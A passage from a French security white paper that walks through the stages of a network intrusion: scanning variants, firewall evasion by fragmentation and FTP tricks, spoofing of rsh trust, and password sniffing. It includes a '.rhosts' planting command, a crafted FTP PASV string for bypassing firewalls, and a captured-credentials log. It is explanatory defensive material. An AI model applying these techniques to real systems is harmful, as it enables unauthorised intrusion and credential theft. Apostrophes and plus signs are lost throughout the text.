utilisent couramment des paquets UDP en incrémentant le numéro de port à chaque saut, la
réponse est un paquet ICMP), et les informations peuvent être obtenues par d.autres moyens
publics. Leur utilisation dans cette phase est donc superflue et risque d.alerter prématurément
les administrateurs de la victime.


3.6 Social-engineering
Même si dans les sociétés ayant déployé une politique de sécurité adéquat les tentatives de
social-engineering directes ont peu de chance d.aboutir, une demande d.information bénigne
auprès du service de support informatique est très souvent acceptée.
Notre agresseur, se faisant passer pour un utilisateur du système, peut ainsi demander les
adresses des proxy, des serveurs de messagerie internes, ou des serveurs Web internes, en
étoffant sa crédibilité grâce par exemple aux informations recueillies avec les méthodes vues
précédemment.

4. Scanning
La phase de recherche environnementale terminée, et la liste des cibles établies, le pirate va
s.employer à balayer le réseau cible afin d.en obtenir une topologie détaillée, aussi bien d.un
niveau réseau qu.applicatif. L.intérêt de cette phase, qui touche directement les systèmes cibles
et est donc la première partie décelable d.une tentative d.intrusion, est de trouver un ou
plusieurs systèmes « exploitables », c.est-à-dire qu.il sera facile au pirate de compromettre.

N.oublions pas aussi le caractère opportuniste d.une attaque : il suffit potentiellement d.une
seule vulnérabilité pour réussir une intrusion sur un système d.information ; c.est aussi la grande
différence avec le travail des administrateurs systèmes ou des équipes d.audit, qui doivent
identifier et corriger toutes les failles. Le pirate peut donc pour des raisons de furtivité arrêter
cette phase de scanning dès qu.il trouve un système vulnérable, le facteur chance est dans ce
cas prépondérant.


4.1 Rappel sur les protocoles TCP/IP
TCP/IP est la famille de protocoles utilisés pour le transport logique des données sur Internet, et
maintenant sur la plupart des réseaux locaux. Ses mécanismes, conçus il y a plus d.une
vingtaine d.années, ont été étudiés pour permettre une facilité d.implémentation et d.utilisation,
et souffrent de nombreux problèmes de sécurités inhérents.


4.1.1 IP
Rappelons les formats des paquets IP. IP est le protocole correspondant à la couche
« Réseau » du modèle OSI (bien qu.IP soit antérieur à ce modèle). C.est donc IP qui s.occupe
de la notion d.adressage, ici sous forme d.adresse IP sous 4 octets, souvent représentées par la
notation quadruplet a.b.c.d . IP est responsable du routage des paquets de leur source à la
destination ; un routage adaptable au vol est d.ailleurs une des problématiques à l.origine
d.Arpa, le précurseur d.Internet. IP s.occupe aussi de la fragmentation des paquets, c.est-à-dire
leur découpage en plus petits paquets afin de s.adapter aux contraintes des couches inférieures
(physiques). La taille maximum des données que peut véhiculer un support physique donné est
exprimée par son MTU (Maximum Transmit Unit) . IP découpe donc les données
(fragmentation) pour les adapter au MTU du lien dans le cas d.une transmission, et les regroupe
(défragmentation) avant de les remonter aux couches supérieures dans le cas d.une réception
de paquet. Finalement, IP veille à ce qu.il n.y ait pas de bouclages de paquets, ou de paquets
éternels en attribuant à chacun un Time-to-Live (durée de vie), qui donne le nombre d.interfaces
(ou de systèmes, suivant les implémentations) que le paquet peut traverser avant d.être détruit.
Une telle destruction de paquet, lorsque son TTL arrive à 0, génère un message ICMP « Time
Exceeded in Transit » qui est renvoyé à l.émetteur du paquet.

Les paquets IP sont constitués de la façon suivante :
(bits)
0 4 8 12 16 18 20 24 28 31
Version IHL Type de service Longueur totale
Identification Flags Offset
TTL Protocole Checksum en-tête
Adresse source
Adresse destination
Options (si présentes) Padding
Données …
(par exemple, paquet TCP ou UDP)
En-tête IP
(IP header)

Flags :
IP_RF 0x8000 reserved fragment flag
IP_DF 0x4000 dont fragment flag
IP_MF 0x2000 more fragments flag
IP_OFFMASK 0x1fff mask for fragmenting bits


Les données véhiculées par un paquet IP ne sont pas des données brutes de communication
d.applications, mais des données d.autres protocoles comme TCP ou UDP, dit de transport,
encapsulées dans le paquet IP. C.est le principe fondamental de l.encapsulation/décapsulation
du modèle en couches. Chaque couche rajoute ses données de contrôle dans une en-tête qui lui
est propre, les données véhiculées (qui contiennent elles-mêmes des en-têtes) lui sont
complètement opaques.


4.1.2 TCP
TCP est le protocole IP correspondant au protocole connecté du modèle OSI. TCP s.occupe
donc d.assurer un transport fiable d.un service source à un service destination, identifiés tous
deux par un numéro dit numéro de port (entre 0 et 65535), en établissant une connexion logique
et une vérification de transmission des données, avec retransmission en cas d.erreur (PAR,
Positive Acknowledgment with Retransmission).

L.établissement d.une connexion TCP s.effectue par un mécanisme dit de 3-way handshake.
La machine source A désirant établir une connexion envoie un paquet TCP contenant le flag
SYN et un numéro de séquence SN=x. La machine recevant la connexion B l.accepte ou non,
suivant qu.il y ait ou non un processus prêt à répondre à la demande sur le port destination de la
connexion. Dans le cas positif, B répond par SYN ACK, SN=y, et AN=x 1 (numéro
d.acquittement). Sinon, A répond par un paquet contenant le flag d.interruption brutale RST.
Lorsque A reçoit le paquet SYN ACK, A émet un paquet contenant le flag ACK et un
acquittement AN=y 1. La connexion est alors établie, le transfert des données peut alors
commencer. Les acquittements suivants doivent être effectués pour tous les octets transférés.
Format d’un paquet TCP
bits
0 4 8 12 16 20 24 28 31
Port source Port destination
Numéro de séquence
Numéro d’acknowledgment
Offset Reservé Flags Window
Checksum Pointeur urgent
Options Padding
Données
Flags :
TH_SYN 0x02 Bit de Synchronisation
TH_RST 0x04 Réinitialisation (Reset), interruption brutale de connexion
TH_PUSH 0x08 Force le ‘push’ (délivre les données à l’application)
TH_ACK 0x10 Acknowledgment
TH_URG 0x20 Données urgentes
4.1.3 UDP
UDP est le protocole sans connexion de la famille IP. Comme dans TCP, une notion de port4
source et de port destination est utilisée pour multiplexer/démultiplexer les transferts de données


4 il est à noter qu.un port UDP n.a aucune relation avec un port TCP, même si les deux couvrent la même
notion.

entre les applications d.émission et de réception. Dans le cas d.UDP, aucun établissement de
connexion préliminaire n.est effectué, et aucun contrôle du transfert n.est directement assuré.
Dans le cas de l.envoi d.un paquet vers un port non bindé5, c.est-à-dire un port sur lequel
aucune application n.écoute, un message ICMP « Port Unreachable » est renvoyé à
l.expéditeur.


4.2 Recherche des machines actives : scan ICMP et TCP
Le pirate balaie les adresses IP trouvées dans la phase d.identification et, par adresse, envoie
un packet ICMP « Echo Request ». Les machines actives (up) répondent par un paquet ICMP
« Echo Reply ».
Le protocole de messages et diagnostics ICMP est cependant souvent filtré, en raison des
nombreuses fonctionnalités risquées qu.il présente (par exemple, ICMP « Redirect » permettant
de reconfigurer une route). L.agresseur peut donc utiliser en alternative une méthode dite de
ACK-scan. Il envoie un paquet TCP vers un service quelconque, contenant le bit ACK
positionné dans les flags. Ce paquet ne correspondant à aucune connexion établie, la machine
distante, si elle est active, répond par un paquet TCP contenant le flag RST de réinitialisation de
connexion.
Etant donné que certains filtres IP (firewalls) annoncent le refus des paquets par un message
ICMP, le scan ICMP permet donc aussi de faire une découverte rudimentaire des règles de
filtrage IP.


4.3 Port scanning TCP et UDP
L.idée de ce type de scan, le plus important et le plus répandu, est d.obtenir la liste des services
en écoute sur les machines distantes. Ces services sont susceptibles d.être fournis par des
applicatifs contenant des bugs de sécurité, tels que les bugs d.implémentation que nous
décrirons dans la phase suivante.
L.agresseur envoie donc, par IP (active) et par port intéressant, des paquets qui, suivant la
réponse qu.ils génèrent, permettront de dire si le port est ouvert (en écoute) ou non.
L.envoi d.un paquet vers un port donné est appelé probe vers ce port.

La découverte et la publication d.un bug sur telle ou telle application serveur publique, comme
récemment en janvier 2001 le serveur de noms DNS bind d.ISC entraîne très souvent des
milliers de scans de pirates pour les ports correspondants aux applicatifs incriminés, le port 53
(TCP et UDP) dans le cas de bind. Les ports scannés sont donc principalement les ports
associés à des services contenant des vulnérabilités connues, et non des ports libres. En
particulier, les scans visent la plupart du temps les ports inférieurs à 1024, historiquement
réservés aux services publics tels que DNS (53, en TCP et UDP), http (80 en TCP), portmap
(111 en TCP), POP3 (110 en TCP).

Le scanning de ports étant assez bruyant au niveau des enregistrements (logs) des firewalls ou
des systèmes de détection d.intrusion, de nombreuses variations existent pour assurer la
furtivité des scans. Nous distinguons en particulier :

4.3.1.1 TCP connect scan
Ce type de scan, le plus simple à implémenter car il ne nécessite aucune manipulation de
paquet, tente d.établir une connexion légitime avec le port visé de la machine distante. C.est
aussi le scan le plus visible.

5 venant de la primitive C bind() de l.API des sockets BSD, qui permet de « nommer » une socket et donc
de s.attacher à un port donner dans le cas TCP/UDP.


4.3.1.2 UDP scan
L.unique technique de scanning UDP consiste à envoyer un paquet au port UDP visé et attendre
un éventuel message de réponse ICMP « Port Unreachable ». Si ce message est reçu, le port
est fermé ou filtré. Cependant, le scan UDP est peu fiable car il est nécessaire que l.ICMP soit
autorisé en sortie. D.autre part, de nombreuses stacks IP empêchent l.envoi trop rapide de
réponses ICMP (au maximum 80 messages toutes les 4 secondes sous Linux par exemple,
technique dite de throttle).

4.3.1.3 TCP SYN Scan
Le SYN Scan consiste à réaliser seulement une partie du 3-way handshake de l.établissement
d.une connexion TCP, d.où son autre nom de half-open scan. L.agresseur envoie un paquet
contenant le flag SYN au port à tester de la machine cible. Si celle-ci répond par un paquet
contenant les flags SYN ACK, alors le port est ouvert et un service y est disponible. Sinon (cas
où la cible répond par RST), le port est fermé. Une fois l.état du port déterminé par la réponse de
la cible, l.agresseur ne finalise pas l.établissement de la connexion par un ACK mais détruit la
connexion au moyen d.un RST. La connexion n.apparaît donc pas dans les logs des services de
surveillance orientés connexion, tels que les tcpwrappers. Un tel scan est par contre détectable
assez facilement par un système de détection d.intrusion en surveillant les paquets SYN.

4.3.1.4 TCP FIN Scan, NULL Scan, XMAS Scan6
D.après le RFC 793, la couche TCP/IP d.un système d.exploitation doit répondre par RST à tout
paquet adressé à un port fermé, tandis qu.elle doit ignorer et ne pas répondre aux paquets non
SYN adressés aux ports ouverts. L.idée des scans FIN, NULL et XMAS est d.utiliser des
paquets contenant respectivement le flag FIN, aucun flag, les flags FIN URG et PUSH pour
vérifier cette condition. Cependant quelques systèmes ne suivent pas les spécifications posées
dans le RFC, et ces scans s.avèrent inopérants sur les plate-formes Microsoft (Windows NT et
9x), Cisco IOS, BSDI, HP/UX, SGI Irix.
Ce type de scan est très difficile à détecter pour un IDS réseau, car il lui faudrait mémoriser
toutes les connexions afin de déterminer si le FIN correspond à une connexion réellement
établie ou non. Les IDS réseau reconnaissent les scans FIN en remarquant les rafales de
paquets FIN vers différents ports en un laps de temps très courts. Insérer un délai suffisant entre
les probes permet d.éviter la détection de ces scans.

4.3.1.5 FTP bounce scanning
Le protocole FTP pose une communication à deux canaux pour le transfert de fichiers: une
communication vers le port TCP 21 du serveur est établie par le client et sert de canal pour les
commandes, un autre canal est établi à partir du port source 20 vers un port libre aléatoire côté
client pour le transfert des données (listing des fichiers, envoi ou réception de fichiers)
proprement dites.
Ce mécanisme, outre les autres failles inhérentes de FTP (à savoir, passage en clair des
identifiants et mots de passe), présente un risque de sécurité important car l.IP et le port vers
lesquels le serveur effectuera la connexion de retour pour l.envoi des données sont spécifiés par
le client, au moyen d.une commande PORT x,x,x,x,y,y (où x,x,x,x est l.adresse IP, octets
séparés par des virgules et y,y sont les deux octets du numéro de port). Le client est donc libre
de spécifier n.importe quelle IP et n.importe quel port. Si aucune vérification n.est effectuée côté
serveur, celui-ci ira établir une connexion vers une machine tiers. Un agresseur peut ainsi
effectuer un scan de ports au moyen de la commande PORT, répétée autant de fois que

6 Description précise dans le manuel du scanner de ports nmap par Fyodor, http://www.insecure.org/


nécessaire. Les messages d.erreurs renvoyés par le serveur FTP indiquent que le port spécifié
n.est pas ouvert ou est filtré. Un transfert effectué sans erreur indique au contraire que le port
est ouvert.
Même si la plupart des implémentations actuelles de serveurs FTP interdisent de telles
commandes PORT, de nombreuses machines sur Internet contiennent encore des serveurs FTP
affectés qui peuvent servir de relais pour des scans, sans même que l.agresseur ait besoin d.en
prendre le contrôle (en se connectant au serveur en ftp anonyme, par exemple). En effet, la
machine source du scan sera vue par la cible comme étant le serveur FTP. D.autre part, dans le
cas de réseaux protégés par un filtre, la présence d.un serveur FTP vulnérable à une telle
attaque peut être utilisée pour passer le filtre avec les règles relatives à la machine hébergeant
le serveur FTP.


4.3.2 Techniques avancées de scanning
Voyons ici quelques techniques mettant en défaut certains filtres IP (firewalls) et IDS.

4.3.2.1 Ports sources spéciaux
Comme nous venons de voir, le protocole FTP s.attend à ce que toute communication de
données soit faite avec comme port source au niveau serveur le port 20, et comme destination
un port quelconque côté client. Ceci est souvent pris en compte dans les règles de firewall en
incluant une règle, extrêmement dangereuse, acceptant toute connexion entrante sur le réseau
dont le port source est 20. Ce type de règle est à proscrire; il est très facile de choisir le port
source d.une connexion et un firewall arborant une telle règle est équivalent à pas de firewall au
niveau TCP. Des outils7 permettent même de positionner le port source de n.importe quelle
connexion à une valeur donnée, sans besoin de modifier les logiciels eux-mêmes.
Un autre port source souvent accepté en entrée, cette fois-ci pour UDP, est le port 53, qui
correspond à la source d.une requête DNS. De nombreuses configurations de firewalls incluent
par facilité des règles telles que « accepter tout paquet vers notre serveur DNS ayant comme
port source 53 », exposant ainsi le serveur entier à des attaques sur des services UDP autres
que DNS.

4.3.2.2 Rebonds au travers de proxies applicatifs
De nombreuses organisations disposent de proxies applicatifs dans des buts de sécurité (socks,
firewalls applicatifs tels que NAI Gauntlet) ou d.optimisation du trafic Internet (proxy-cache http).
Ces proxies, lorsqu.ils sont mal configurés, peuvent servir de rebonds à un utilisateur extérieur
pour attaquer le réseau interne ou un autre réseau de façon anonyme. Les proxies les plus
recherchés par les pirates sont les proxies http8 et Wingate, souvent utilisables sans
authentification.

4.3.2.3 Fragmentation IP
Une des fonctionnalités rendues par IP est la fragmentation des paquets pour les adapter aux
contraintes de taille du support physique, le lien. Ainsi, il est possible de découper les paquets
de telle façon que les informations nécessaires au firewall pour décider de l.acceptation ou non
du paquet soient distribuées sur plusieurs fragments, en coupant par exemple l.en-tête TCP en
deux. Les alternatives possibles pour le firewall sont alors l.acceptation/le refus sans examen du
paquet ou l.attente des autres fragments pour pouvoir défragmenter le paquet et ainsi disposer
de l.en-tête complet pour faire la décision de passage. Dans de nombreux cas (en particulier
dans les filtres IP simples des routeurs, sur les réseaux à grand débit), le coût de cette

7 nmap (http://www.insecure.org/) et ADMfzap (ftp://adm.freelsd.net/pub/ADM/)
8 Les caches http tels que Microsoft Proxy Server, Squid, permettent aussi d.émettre des connexions non
http, notamment au moyen des méthodes POST et CONNECT.

défragmentation est trop important et seuls les fragments d.offset 0 (censés contenir les
informations de décision) sont inspectés, les autres sont par défaut acceptés.

4.3.2.4 Sémantique des fragments spéciaux
L.offset des fragments est en fait le rang (offset) du premier octet de données du fragment dans
le paquet final réassemblé :
En jouant sur l.offset, nous pouvons créer des fragments chevauchant les précédents et
réécrivant des données d.autres fragments, telles que les en-têtes TCP ou UDP contenues dans
le paquet IP. Comme précédemment, le filtre doit disposer de l.intégralité des fragments pour
pouvoir appliquer les règles au paquet. De plus, le filtre ne sait pas à priori comment va réagir la
machine destination à cette réécriture des paquets par fragments se chevauchant : ce
comportement dépend en effet de la stack IP de la machine distante, et quasiment tous les cas
existent (réécriture des données en se conformant aux derniers fragments reçus, abandon des
fragments se chevauchant, abandon pur et simple du paquet, .). Ce problème appartient à une
classe plus importante dite de sémantique de la stack IP (impossibilité de prévoir la réaction de
la stack IP à certains stimuli, sans en connaître l.implémentation), et a été popularisé comme
moyen de contourner certains IDS et filtres IP. Des outils9 sont disponibles pour implémenter
ces attaques.

4.3.2.5 Bugs des stacks IP ou de firewalling, exemples

Linux IPCHAINS10
La couche de firewalling des noyaux Linux < 2.2.11 contient un bug découvert en juillet 1999 par
Thomas Lopatic de Data Protect AG, permettant, sous certaines conditions, de procéder à la
réécriture du port dans l.en-tête TCP ou UDP du paquet. Il est ainsi possible de faire accepter
toute connexion vers un port arbitraire d.une machine protégée par un firewall Linux affecté et
pour laquelle il existe au moins un port non filtré. La vulnérabilité est dans le fait que le noyau
considère un fragment d.offset égal à 0 trop petit pour contenir toute l.en-tête de transport (TCP
ou UDP) comme un fragment d.offset supérieur à 0.

Le scénario d.attaque est alors le suivant :

9 Fragrouter, http://www.anzen.com/research/nidsbench/
10 http://www.dataprotect.com/ipchains/

En-tête IP (0)
A
B
C
D
0
20
40
60
20
80
Offset de
fragmentation
En-tête IP (0)
A
En-tête IP (20)
B
En-tête IP (40)
C
En-tête IP (60)
D
20
20

1. L.agresseur lance un fragment vers la machine protégée contenant le flag IP_MF, un
offset de 0 et une en-tête TCP avec un port non filtré,
2. Il lance ensuite un fragment d.offset 0 d.une longueur de 4 octets, contenant le port filtré
à contacter. En vertu du bug, ce fragment sera traité comme un fragment d.offset
supérieur à 0 et les données viendront recouvrir le port non filtré du premier fragment.
3. Il termine le paquet par un fragment sans flag IP_MF et contenant le reste des données
du paquet.


Inspection des réponses de serveurs FTP protégés
Afin de permettre à des clients externes de se connecter à un serveur FTP protégé par un
firewall, de nombreux firewalls proposent une solution d.inspection du contenu de chaque
paquet de réponse du serveur. Lorsqu.un tel paquet commence par la chaîne .227 .
(correspondant à une acceptation de la commande PASV d.ouverture d.un canal de données
symétrique à la commande PORT), le firewall extrait l.adresse IP et le numéro de port spécifié
dans ce paquet et ouvre un « trou » temporaire dans le firewall pour laisser passer cette
connexion du client vers l.adresse en question, normalement le serveur FTP lui-même. En
forçant le serveur FTP à répondre par une chaîne .227 . adéquate, il est possible d.ouvrir une
connexion TCP vers n.importe quel port de n.importe quelle machine protégée. Cette réponse
peut être obtenue en envoyant une commande similaire à .xxx227 Entering Passive Mode
(192,168,1,10,192,3). où a,b,c,d est l.adresse IP de la cible et e,f le port désiré. Le serveur
répondra par un message d.erreur similaire à : « Unknown command : xxx227 Entering Passive
Mode (192,168,1,10,192,3) ». En jouant sur l.option MSS de la connexion TCP, qui spécifie la
taille maximum des segments de données transmis, il est facile de couper le flux pour que 227
soit au début d.un paquet.
De nombreux firewalls IP sont affectés par cette vulnérabilité, découverte en février 2000 par
John Mc Donald de Data Protect AG11 : Checkpoint FW1 4.0 et 3.0, Cisco PIX 5.0 et 4.x, Linux
ipchains, .


4.3.3 Autres techniques de découverte de la topologie
4.3.3.1 Détection des systèmes d.exploitation
Le nombre de stacks IP actuellement disponibles implique autant de comportements différents
pour le traitement des paquets spéciaux, des erreurs, . Cette constatation est la base de
l.identification distante des systèmes d.exploitation, compte tenu de leurs réactions à certains
paquets de test : réaction à l.envoi d.un paquet FIN (Microsoft Windows répond par RST alors
que le RFC 793 recommande de ne pas répondre), incrément des numéros de séquences
initiaux, .
La granularité obtenue actuellement dans certains scanners est importante, allant même jusqu.à
l.identification des patchs installés en plus de la version du système d.exploitation.

4.3.3.2 Firewalking
Cette technique, dérivée de traceroute, consiste à envoyer des paquets IP dont on incrémente
successivement le TTL. Les réponses reçues nous donnent toutes les passerelles entre notre
source et la machine destination. Le firewalking consiste aussi à faire varier les protocoles
véhiculés par les paquets IP de test pour être par exemple acceptés par un firewall, la décision
d.acceptation se faisant souvent sur le protocole de transport (TCP ou UDP vers le port donné
d.une IP donnée).

11http://www.dataprotect.com/,
http://www.securityfocus.com/frames/?content=/vdb/bottom.html?vid=979


Le pirate est ainsi capable d.obtenir une cartographie précise d.une zone protégée par un
firewall, et de déterminer les règles d.accès de ce firewall.

4.3.3.3 Analyse applicative des ports ouverts
Afin d.optimiser les chances de succès de l.intrusion, l.agresseur détermine les versions précises
des services ouverts qu.il a pu trouver grâce au scanning. Pour se faire, il corrèle les résultats de
la découverte du système d.exploitation (méthodes précédentes) avec des analyses niveau
application des bannières présentes sur les ports ouverts.
En effet, les services répondent souvent aux clients qui se connectent par une bannière
d.identification, donnant type et version du service.
Par exemple, la connexion au port 21 d.une machine donne le résultat suivant :

[root@secway /] telnet alyssa 21
Trying 192.168.1.18...
Connected to alyssa.
Escape character is '^]'.
220 alyssa FTP server (SunOS 4.1) ready.

La bannière affichée indique non seulement un serveur FTP, mais aussi la version du système
d.exploitation (ici, une machine Sparc SunOS 4.1).

De la même manière, si aucune bannière n.est affichée, nous pouvons déduire ces informations
de la réponse du serveur à une requête classique.

[root@secway /]# telnet hera 8123
Trying 192.168.1.14...
Connected to hera.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2001 18:02:21 GMT
Server: Apache/1.3.12 Ben-SSL/1.40 (Unix) PHP/4.0.1pl2 FrontPage/4.0.4.3
Last-Modified: Mon, 20 Sep 1999 15:25:36 GMT
ETag: "555cf-f08-37e651f0"
Accept-Ranges: bytes
Content-Length: 3848
Connection: close
!content-type:! text/html

Le port 8123 du serveur hera est dans ce cas un serveur Web Apache 1.3.12 sur une machine
Unix. Il dispose de plus des extensions Frontpage et SSL.

La technique de mail-bounce décrite dans la phase de recherche environnementale peut aussi
être reprise pour obtenir les versions des serveurs Mail utilisés.

Certains services ont pour fonction première de fournir des informations. C.est le cas de SNMP,
finger. Un agresseur peut obtenir des MIB standards d.un serveur SNMP (souvent accessibles
en lecture seule avec des noms de communautés par défaut tels que « public », « cisco ») des
données comme : le nombre et la nature des interfaces réseaux de l.équipement, la version du
système, le nombre d.utilisateurs connectés, les adresses ARP des cartes, .

5. Exploitation
Le pirate a collecté suffisamment d.information pour être capable de déterminer le point le plus
faible du réseau, celui sur lequel l.attaque sera la plus discrète et la plus optimale possible.
La phase d.exploitation est le tournant de l.intrusion, celle à partir de laquelle l.agresseur ne peut
plus reculer : autant la phase de scanning peut-elle être considérée comme une simple
« recherche d.information », l.exploitation montre un engagement de l.agresseur dans une action
offensive hostile.
Cette phase est généralement très brève car elle se résume à l.utilisation d.un bug pour prendre
le contrôle d.un système. Le pirate passe ensuite dans une phase de progression si le système
compromis lui convient (d.un point de vue emplacement par exemple) pour mener à bien son
intrusion, ou sinon recommence la phase d.exploitation sur un autre système : c.est dans cette
phase que le caractère opportuniste de l.attaque dont nous avons parlé précédemment est le
mieux mis en lumière.

Détaillons maintenant les principales méthodes pour gagner l.accès à un système cible. Ces
attaques peuvent être menées contre des services filtrés en utilisant les mêmes techniques de
contournement que celles vues précédemment pour le scanning.


5.1 Classe des attaques par usurpation d.identité
L.authentification, en tant que reconnaissance fiable d.un utilisateur par certains critères secrets
tels que les mots de passe, est la principale défense pour protéger l.accès à un système. C.est
donc aussi la porte d.entrée la plus souvent forcée, les systèmes d.authentification déployés
actuellement utilisant des concepts beaucoup trop faibles pour les techniques d.attaques
modernes.


5.1.1 Découverte d.informations d.authentification par essais
La technique la plus classique d.usurpation d.identité est celle dite de « brute force » des
informations d.authentification d.utilisateurs donnés. Le pirate essaie des combinaisons de
logins/mots de passe (dans le cas d.un système d.authentification par mot de passe) jusqu.à
trouver un couple valide. Cette méthode, certaine mais délicate car facilement identifiable et
potentiellement très longue, peut être facilitée par de nombreux moyens : les informations
découvertes dans la phase d.identification de la cible ou de scanning, telles que les noms
d.utilisateurs ou e-mails internes valides peuvent par exemple donner des logins valides. Les
mots de passe à essayer sont tirés d.un dictionnaire, dérivés du login ou dérivés de dictionnaires
adaptés (par exemple bâtis à partir de tous les mots présents sur le site Web de la cible).


5.1.2 Abus de relations de confiance
Un système d.information est inévitablement construit autour de relations de confiance qu.ont les
différents éléments entre eux. Typiquement, un serveur d.authentification centralisé est par
excellence l.élément de confiance (on dit « trusté ») du système d.information. Il a été
historiquement très commun d.établir des relations de confiance entre machines pour les
authentifications auprès de services comme les r- services BSD (rlogin/rsh/rexec). De même,
l.authentification auprès de NFS est faite par la machine client : pouvoir changer son identifiant
Unix sur la machine client revient à pouvoir accéder aux fichiers NFS des autres utilisateurs, le
contrôle de l.UID étant effectué côté client.

Nous mettons ainsi en évidence une méthode d.usurpation d.identité mettant en jeu les relations
de confiance entre machines. L.exemple le plus connu12 de ce type d.attaques est celui du TCP
Spoofing contre les serveurs rsh. Les serveurs rsh permettent une authentification par relations
de confiance entre machines sur le modèle suivant : un client situé sur une machine A peut
accéder sans demande de mot de passe à la machine serveur rsh B si celle-ci contient un fichier
de configuration ($HOME/.rhosts) établissant une relation de confiance avec A. rsh étant
implémenté au dessus de TCP, qui se charge de la négociation d.une véritable connexion
logique entre les deux machines, ceci n.aurait pas été un véritable problème sans certains
défauts de conception des stacks IP en ce qui concerne la génération des numéros de
séquence initiaux (ISN) TCP.
Rappelons que la machine B, en réponse à une demande de connexion de A, renvoie à A un
paquet contenant un acquittement du numéro de séquence envoyé par A, ainsi qu.un autre
numéro de séquence y, supposé aléatoire. A va alors répondre en acquittant y, et la connexion
est ainsi établie. Dans le cas normal, le fait que seul A connaît le numéro de séquence y
retourné par B garanti que c.est bien A à l.autre bout du flux. Cependant, la quasi-totalité des
stacks IP d.il y a une dizaine d.années incrémentaient les ISN par pas de 64k. Il était donc facile
d.immobiliser A pour ne pas qu.elle réponde (déni de service sur A), de prévoir le numéro y
retourné par B, l.acquitter à la place de A et ainsi établir une connexion fictive « à l.aveugle »
entre A et B. Le pirate exécute par ce biais des commandes telles que echo >> ~/.rhosts
lui permettant d.accéder à la cible par rsh, directement de sa machine d.attaque.
Des attaques similaires sont possibles sur NFS, encore plus faciles au niveau transport car le
protocole utilisé est UDP (donc pas d.établissement de connexion logique). Le pirate réalise une
opération de montage fictive du partage NFS visé vers un système trusté non actif, ouvre un
fichier (par exemple un ~/.rhosts) et y écrit ce qu.il souhaite. Dans ce cas, le seul facteur à
maîtriser est le filehandle NFS (numéro de fichier NFS attribué aléatoirement à l.ouverture du
fichier).
Finalement, bien que cela soit fortement déconseillé, DNS est souvent utilisé pour la
construction de relations de confiance : au lieu de préciser l.adresse IP, seul identifiant unique
d.une machine, il est fréquent d.utiliser le nom DNS de la machine trustée. De la même manière,
la compromission du serveur DNS (compromission directe ou pollution des caches DNS,
prédiction des identifiants de requêtes) entraîne la compromission de l.autre serveur.


5.1.3 Interception d'informations d'authentification
Nous avons vu que toute machine « proche » topologiquement de la cible est elle-même une
cible potentiellement intéressante. En effet, prendre le contrôle d.une des machines du
prestataire Internet permet par exemple d.inspecter le trafic réseau de l.organisation, de
l.enregistrer et souvent d.intercepter des informations d.authentification (mots de passe) circulant
en clair sur le réseau.
Même si la mode est au chiffrement des données pour leur assurer confidentialité et intégrité, de
nombreux protocoles véhiculent toujours leurs données, dont l.authentification, en clair. C.est le
cas des services de récupération de courrier POP, IMAP, des services FTP, telnet, rlogin et de
nombreux autres.
De nombreux outils, appelés sniffers, sont disponibles pour capturer du trafic réseau à des fins
d.analyse et de diagnostic. Certains sont spécifiquement écrits pour capturer des mots de
passe : pcs13, dsniff14. Ces sniffers dédiés aux pirates peuvent être équipés de fonctionnalités
évoluées comme le chiffrement des données capturées, le renvoi en temps réel de ces données
vers d.autres serveurs, ..

12 car popularisé par le fameux pirate Kevin Mitnick.
13 PCS par Halflife, http://packetstorm.securify.com/Exploit_Code_Archive/pcs.tgz
14 DSNIFF par Dug Song, http://www.m!onkey!.org/~dugsong/dsniff/

L.exemple suivant montre un fichier produit par le sniffer pcs. On remarque qu.une connexion ftp
entre les machines intra et gaia a été interceptée et enregistrée. Nous pouvons y voir le login
(bob) et le mot de passe (m0nP4sS) de l.utilisateur qui s.est connecté.

---
PATH: intra.Secway-int.net(2611) => gaia.Secway-int.net(ftp)
DATE: Wed Mar 7 03:55:25 2001
USER bob
PASS m0nP4sS
SYST
PASV
LIST
CWD /tmp
PASV
LIST
QUIT
[CLOSED]


La démocratisation des solutions de chiffrement telles que SSH (remplacement de telnet) ou
SSL (http et beaucoup d.autres protocoles) a poussé les pirates a trouver des attaques plus
subtiles pour intercepter les informations d.authentification.
Aussi, l.attaque la plus fréquente15 dans le cadre de l.interception de données chiffrées est
l.attaque dite man-in-the-middle. Nombre de solutions de chiffrement telles que SSH ou SSL
reposent sur un chiffrement asymétrique, à base de clef publique/clef privée pour échanger une
clef symétrique dite de session. Un client A qui souhaite se connecter au serveur B lui envoie sa
clef publique, et réciproquement. Un pirate s.étant introduit entre A et B peut intercepter la
connexion, se faire passer pour B et envoyer sa propre clef publique à A. Celui-ci dialoguera
avec le pirate, pensant dialoguer avec B. En retour, le pirate dialoguera avec B et enverra les
réponses de B à A. Cette attaque est possible si l.utilisateur ne vérifie pas que la clef publique
qu.il a reçue est bien celle de B (cette distribution et certification des clefs est la problématique
que tentent de régler les PKI).


5.1.4 Détournement de flux existants
Une variation de l.attaque précédente consiste à se placer sur le chemin d.une connexion entre
A et B et y insérer des données qui seront reconnues comme valides venant de l.autre par la
machine qui les reçoit. Cette possibilité est cependant subordonnée à une vulnérabilité dans le
système de chiffrement et de vérification, telle que celle découverte en 1998 dans SSH16.
Cette méthode est évidemment aussi applicable, et encore plus facilement, aux flux non chiffrés
grâce à des outils comme Hunt17.
Le pirate a même la possibilité de prendre le contrôle complet du flux existant, par une
technique dite de Hijacking, où l.agresseur vient se synchroniser sur la connexion existante en
reprenant ses paramètres (paramètres TCP tels que AN/SN/Window/.) et en la coupant du
client légitime.

15 Le « cassage » du chiffrement est hors de portée de la plupart des pirates, sauf cas précis où les
informations de chiffrement ont été exposées (compromission des clefs privées ou des certificats).
16 ssh insertion attack, Core SDI, http://www.core-sdi.com/soft/ssh/ssh-advisory.txt
17 Hunt 1.5 par Pavel Krauz, http://lin.fsid.cvut.cz/~kra/index.html#HUNT


5.2 Exploitation de fautes d.implémentation
La grande majorité des incidents récents sont à déplorer du fait de bugs dans les logiciels
permettant d.en prendre le contrôle à distance, ou d.élever ses privilèges en local. Les fautes



d.implémentation ont toujours été un des problèmes majeurs de la sécurité, car impossibles à
éradiquer complètement. Souvent, seuls des correctifs venant du constructeur (patchs) sont en
mesure de résoudre le problème.

Les fautes d.implémentation sont tellement importantes et courantes que de nombreux pirates
analysent eux-même les codes sources de services réseaux largement utilisés, ou
désassemblent les applications commerciales afin d.y trouver des erreurs d.implémentation
qu.ils pourront utiliser pour manipuler le serveur distant. Il en résulte qu.un nombre non
négligeable de programmes destinés à tirer parti de ces failles (appelés exploits ou warez) est
rendu public chaque semaine, et qu.un « marché » parallèle est organisé entre groupes pirates
